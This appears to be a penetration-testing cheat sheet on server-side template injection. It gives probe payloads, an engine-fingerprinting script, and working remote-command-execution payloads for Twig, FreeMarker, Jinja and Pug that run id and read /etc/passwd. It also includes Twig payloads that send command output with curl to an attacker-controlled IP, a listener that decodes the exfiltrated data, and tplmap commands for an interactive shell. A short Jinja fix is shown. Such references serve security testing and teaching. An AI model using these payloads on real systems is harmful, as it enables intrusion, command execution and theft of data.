# Server-side template injection (SSTI)

## Template engines

| Template engine   | Language          | Server / client side     |
| ----------------- | ----------------- | ------------------------ |
| Twig              | PHP               | Server side              |
| Apache FreeMarker | Java (usually)    | Server side              |
| Jinja             | Python            | Server side              |
| Pug / Jade        | JavaScript        | Server side (usually)    |
| Handlebars        | JavaScript        | Server and client side   |
| Mustache          | Various           | Server and client side   |

## General SSTI identification

```sh
# General probe payloads: one arithmetic expression per delimiter family.
# 1234*2 is used instead of the classic 7*7 so that a legitimate "49" on the
# page is not mistaken for evaluation.
{1234*2}
{1234+1234}
%{1234*2}
%{1234+1234}
<%= 1234*2 %>
<%= 1234+1234 %>
${1234*2}
${1234+1234}
{{1234*2}}
{{1234+1234}}
#{1234*2}
#{1234+1234}
@{1234*2}
@{1234+1234}
@(1234*2)
@(1234+1234)

# Identification: the expression was evaluated if the response contains one of
# these instead of the literal payload. The variants come from engine-specific
# number formatting or tag handling (see the per-engine sections).
2468
2,468
2.468
<2468>

# Error-triggering payloads: a polyglot that breaks the parser of most engines
# (an exception or stack trace in the response often names the engine), and an
# undefined-variable probe.
${{<%[%'"}}%\.
<%= foobar %>
```

* <https://github.com/MrW0l05zyn/pentesting/blob/master/web/payloads/ssti/common-ssti-payloads.txt>
* [Payloads All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection).

### Decision tree for template engine identification

<figure><img src="https://3737064856-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FZ9PVDmFKlc3OjCT8nHe3%2Fuploads%2FXv2y4XdQM7PYAfJCKIkD%2Fdecision-tree-for-template-engine-identification-SSTI.png?alt=media&#x26;token=ee4e22c5-8f71-49ca-b355-3924e25d38b3" alt=""><figcaption><p>Decision tree for template engine identification</p></figcaption></figure>
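The probe-and-classify logic above, as an added example that is not part of the original page: it sends the arithmetic payloads, decides for each whether the response reflected it, evaluated it or swallowed it, and maps the engine-specific results from the decision tree (`2468` for `{{1234*'2'}}`, `246824682468` for `{{"2468"*3}}`, `2,468`/`2.468` for `${1234*2}`, `<2468>` for `#{1234*"2"}`) to an engine name. The `probe()` function, the parameter name and the sample responses are assumptions made here for illustration; the samples are constructed, not captured from any real target.

```python
import html
import urllib.parse
import urllib.request

# Probe table taken from the payload list above. Each payload maps to the strings
# that prove it was evaluated instead of echoed back: FreeMarker applies locale
# grouping, Pug turns a line-leading #{...} into an element name, Jinja repeats
# the string, the rest print a bare 2468.
PROBES = {
    "{{1234*2}}":    ["2468"],
    "{{1234*'2'}}":  ["2468"],                # Twig coerces the numeric string
    '{{"2468"*3}}':  ["246824682468"],        # Jinja string repetition
    "${1234*2}":     ["2,468", "2.468"],      # FreeMarker locale formatting
    '#{1234*"2"}':   ["<2468>", "<2468/>"],   # Pug tag-name interpolation
    "<%= 1234*2 %>": ["2468"],
    "%{1234*2}":     ["2468"],
    "#{1234*2}":     ["2468", "<2468>"],
    "@(1234*2)":     ["2468"],
}

# Engine signatures from the decision tree: (payload, evaluated value, engine).
FINGERPRINTS = [
    ("{{1234*'2'}}", "2468", "Twig"),
    ('{{"2468"*3}}', "246824682468", "Jinja"),
    ("${1234*2}", "2,468", "Apache FreeMarker"),
    ("${1234*2}", "2.468", "Apache FreeMarker"),
    ('#{1234*"2"}', "<2468>", "Pug / Jade"),
]


def classify(payload, body):
    """Return 'reflected', 'evaluated' or 'silent' for one probe and its response."""
    text = html.unescape(body)      # apps often HTML-encode reflected input
    if payload in text:
        return "reflected"          # printed back literally: no evaluation
    if any(expected in text for expected in PROBES[payload]):
        return "evaluated"
    return "silent"                 # stripped, errored, or not rendered at all


def fingerprint(responses):
    """responses: {payload: body}. Return the set of engines whose signature appeared."""
    engines = set()
    for payload, value, engine in FINGERPRINTS:
        body = responses.get(payload)
        if body is None:
            continue
        if classify(payload, body) == "evaluated" and value in html.unescape(body):
            engines.add(engine)
    return engines


def probe(url, param, timeout=10):
    """Send every probe in GET parameter `param` and collect the bodies.
    Uses the network, so it is not exercised offline; `url` must not already
    carry a query string (hypothetical helper, not from the original page)."""
    responses = {}
    for payload in PROBES:
        target = url + "?" + urllib.parse.urlencode({param: payload})
        with urllib.request.urlopen(target, timeout=timeout) as resp:
            responses[payload] = resp.read().decode("utf-8", "replace")
    return responses


if __name__ == "__main__":
    # Constructed sample responses (not captured from any real target) that a
    # Twig-backed page would give: numeric-string maths works, the Jinja probe
    # yields a PHP-style number, and the FreeMarker syntax is echoed verbatim.
    samples = {
        "{{1234*'2'}}": "<p>Hello 2468</p>",
        '{{"2468"*3}}': "<p>Hello 7404</p>",
        "${1234*2}": "<p>Hello ${1234*2}</p>",
    }
    for payload, body in samples.items():
        print(f"{payload:16} -> {classify(payload, body)}")
    print("engines:", fingerprint(samples))
```

Against a live target, run `probe("http://<target>/index.php", "<parameter>")` and feed the result to `fingerprint()`; a probe that comes back `silent` is still worth a manual look, since a 500 page or a stripped parameter also produces no match.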

## Twig

General identification. `1234*'2'` evaluates to 2468 because PHP coerces the numeric string; Jinja raises a TypeError on the same expression.

```twig
{{1234*'2'}}
2468
{{-2468-}}
2468
```

General payloads.

```twig
{{1234*2}}
{{1234*'2'}}
{{1234+1234}}
{{1234+'1234'}}
{{-2468-}}
{# The reduce, filter and map filters (Twig 1.41 / 2.10 and later) accept any
   PHP callable by name when the sandbox extension is not enabled, so system()
   and passthru() can be handed the command as their argument #}
{{[0]|reduce('system','id')}}
{{[0]|reduce('passthru','id')}}
{{[0]|reduce('system','cat /etc/passwd')}}
{{[0]|reduce('passthru','cat /etc/passwd')}}
{{['id']|filter('system')}}
{{['id']|filter('passthru')}}
{{['cat /etc/passwd']|filter('system')}}
{{['cat /etc/passwd']|filter('passthru')}}
{# map returns an array, so pipe it through join to print what system()
   returned; passthru writes straight to the output buffer, so it shows up
   even without join #}
{{['id']|map('system')|join}}
{{['id']|map('passthru')}}
{{['cat /etc/passwd']|map('system')|join}}
{{['cat /etc/passwd']|map('passthru')|join}}
```

### Out-of-band (OOB)

Start an HTTP listener on the attacker host.

```sh
python -m SimpleHTTPServer <port>
python3 -m http.server <port>
```

Blind (out-of-band) SSTI identification: the target fetches a URL on the attacker host, so a hit in the listener log confirms execution even when nothing is reflected in the response.

```twig
{{[0]|reduce('system','curl http://<attacker-IP-address>/oob')}}
```

Command execution: the output is captured in a `set` block, URL-encoded with the `url_encode` filter and sent to the listener as a query parameter.

```twig
{% set output %}
{{[0]|reduce('system','id')}}
{% endset %}

{% set exfil = output| url_encode %}
{{[0]|reduce('system','curl http://<attacker-IP-address>/?oob=' ~ exfil)}}
```

File read, exfiltrated the same way.

```twig
{% set output %}
{{[0]|reduce('system','cat /etc/passwd')}}
{% endset %}

{% set exfil = output| url_encode %}
{{[0]|reduce('system','curl http://<attacker-IP-address>/?oob=' ~ exfil)}}
```
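A listener that decodes what the two payloads above send, as an added example that is not part of the original page. A plain `http.server` only logs the raw request line, so multi-line command output arrives as one URL-encoded blob; this handler splits off the `oob` parameter (the name the payloads use), decodes it and prints it, and treats a hit without that parameter as the blind-identification ping. The port handling and the class name are assumptions made here.

```python
import sys
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer


def decode_oob(path, param="oob"):
    """Recover the command output the Twig payload url_encoded into ?oob=...
    Returns None when the request carries no such parameter (a blind ping)."""
    query = urllib.parse.urlsplit(path).query
    values = urllib.parse.parse_qs(query, keep_blank_values=True).get(param)
    return values[0] if values else None


class OOBHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        data = decode_oob(self.path)
        src = self.client_address[0]
        if data is None:
            print(f"[{src}] hit {self.path}  (blind SSTI confirmed)")
        else:
            print(f"[{src}] exfiltrated {len(data)} bytes:\n{data}", end="")
        # Answer quickly so curl on the target exits and the template finishes.
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *_):
        pass  # keep stdout to the decoded data only


if __name__ == "__main__":
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 8000
    print(f"listening on 0.0.0.0:{port}")
    HTTPServer(("0.0.0.0", port), OOBHandler).serve_forever()
```

Twig's `url_encode` uses `rawurlencode`, so spaces and newlines arrive as `%20` and `%0A` and `parse_qs` restores them; if the output is long enough to hit the target's URL length limit, split it on the Twig side (for example with `|slice`) and send several requests.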

## Apache FreeMarker

General identification. FreeMarker formats numbers with the grouping separator of the configured locale, so `2,468` or `2.468` (rather than a bare `2468`) points at FreeMarker.

```ftl
${1234*2}
2,468
2.468
```

```ftl
${1234*2}
${1234+1234}
<#-- ?new instantiates any class implementing TemplateModel; Execute runs a shell
     command. This fails when the application sets
     TemplateClassResolver.SAFER_RESOLVER or ALLOWS_NOTHING_RESOLVER, which
     refuse to resolve Execute and ObjectConstructor -->
${"freemarker.template.utility.Execute"?new()("id")}
${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}
```

## Jinja

General identification. `"2468"*3` is Python string repetition, so `246824682468` (where PHP-based Twig would print a number) identifies Jinja.

```django
{{"2468"*3}}
246824682468
```

```django
{{1234*2}}
{{1234+1234}}
{# Flask only: dumps the app config, including SECRET_KEY and any database URLs #}
{{config|pprint}}
{# Gadget chain: walk object's direct subclasses to warnings.catch_warnings,
   whose instances keep the warnings module in _module; that module's
   __builtins__ exposes __import__, which gets os #}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("id").read()}}{%endif%}{% endfor %}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("cat /etc/passwd").read()}}{%endif%}{% endfor %}
```
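Why the gadget chain in the two payloads above resolves, as an added example that is not part of the original page: the same subclass walk is done in plain Python, step by step, so each hop (`().__class__.__base__`, the name match on `catch_warnings`, `_module`, `__builtins__['__import__']`) can be inspected, and the command runs through exactly that path. The two `render_*` functions need `jinja2` installed and show the vulnerable pattern (compiling attacker text as a template) next to the fix (passing it as data to a fixed template); they are assumptions about a typical Flask-style app, not code from any real project.

```python
import warnings  # makes sure warnings.catch_warnings is among object's subclasses


def find_gadget_class(needle="warning"):
    """Same walk as the {% for %} loop in the payload: scan the direct subclasses
    of object (reached as ().__class__.__base__) for a name containing `needle`.
    The match is warnings.catch_warnings; exception classes such as Warning are
    not direct subclasses of object, so they never match."""
    for cls in ().__class__.__base__.__subclasses__():
        if needle in cls.__name__:
            return cls
    return None


def builtins_via_gadget():
    """Reach the real builtins the way the payload does: a catch_warnings
    instance stores the warnings module in `_module`, and a module's
    __builtins__ is the builtins namespace (a dict for imported modules, the
    builtins module object when running as __main__)."""
    cls = find_gadget_class()
    mod = cls()._module
    builtins_ns = mod.__builtins__
    return builtins_ns if isinstance(builtins_ns, dict) else vars(builtins_ns)


def run_via_gadget(cmd):
    """Execute `cmd` exactly as the payload does: __import__('os').popen(cmd).read()."""
    os_mod = builtins_via_gadget()["__import__"]("os")
    return os_mod.popen(cmd).read()


def render_untrusted(template_text, **ctx):
    """Vulnerable pattern (needs jinja2): attacker text is compiled as a
    template, so the payload runs with the application's privileges."""
    from jinja2 import Environment
    return Environment().from_string(template_text).render(**ctx)


def render_fixed(user_text):
    """Fix (needs jinja2): the user string is data for a fixed template and is
    never parsed; autoescape is on so it cannot inject markup either."""
    from jinja2 import Environment
    env = Environment(autoescape=True)
    return env.from_string("Hello {{ name }}").render(name=user_text)


if __name__ == "__main__":
    cls = find_gadget_class()
    print(f"gadget: {cls.__module__}.{cls.__name__}")
    print(run_via_gadget("id"), end="")
    payload = ("{% for x in ().__class__.__base__.__subclasses__() %}"
               "{% if 'warning' in x.__name__ %}"
               "{{x()._module.__builtins__['__import__']('os').popen('id').read()}}"
               "{% endif %}{% endfor %}")
    try:
        print("unsafe render:", render_untrusted(payload).strip())
        print("fixed render:", render_fixed(payload))
    except ImportError:
        print("jinja2 not installed; skipping the render demo")
```

`jinja2.sandbox.SandboxedEnvironment` would also stop this particular chain, because it refuses attribute names starting with an underscore (`__class__`, `_module`, `__builtins__`), but it is a second line of defence: the root cause is `from_string` / `render_template_string` on user-controlled text.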

## Pug / Jade

General identification. At the start of a line Pug treats `#{expr}` as tag-name interpolation, so the result is an element named `2468` (`<2468>`) rather than a bare number.

```pug
#{1234*"2"}
<2468>
```

```pug
#{1234*2}
#{1234*'2'}
#{1234+1234}
//- Templates compile to plain JavaScript functions, so Node globals are in
//- scope; spawnSync returns a Buffer in .stdout that is stringified on output
#{global.process.mainModule.require('child_process').spawnSync('id').stdout}
#{global.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
```

## Handlebars

`read` and `readdir` are not Handlebars built-ins (the core ships only `if`, `unless`, `each`, `with`, `lookup` and `log`), so these payloads only work where the application has registered file-system helpers under those names. Confirm which custom helpers the application exposes before relying on them.

```handlebars
{{#each (readdir "/etc")}}
    {{this}}
{{/each}}

{{read "/etc/passwd"}}
```

## Automated tools

### Tplmap

* <https://github.com/epinna/tplmap>

Installation (tplmap is Python 2 only, hence the python2 virtualenv).

```sh
git clone https://github.com/epinna/tplmap.git
cd tplmap
pip install virtualenv
virtualenv -p python2 virtualenv-tplmap
source virtualenv-tplmap/bin/activate
pip install -r requirements.txt
./tplmap.py
```

Usage. The `*` marks the injection point in the parameter value.

```sh
# GET method
./tplmap.py -u "http://<target>/index.php?<parameter>=value*"

# POST method
./tplmap.py -u "http://<target>" -d <parameter>="value*"

# Command execution
--os-cmd=<command>

# Interactive shell
--os-shell
```
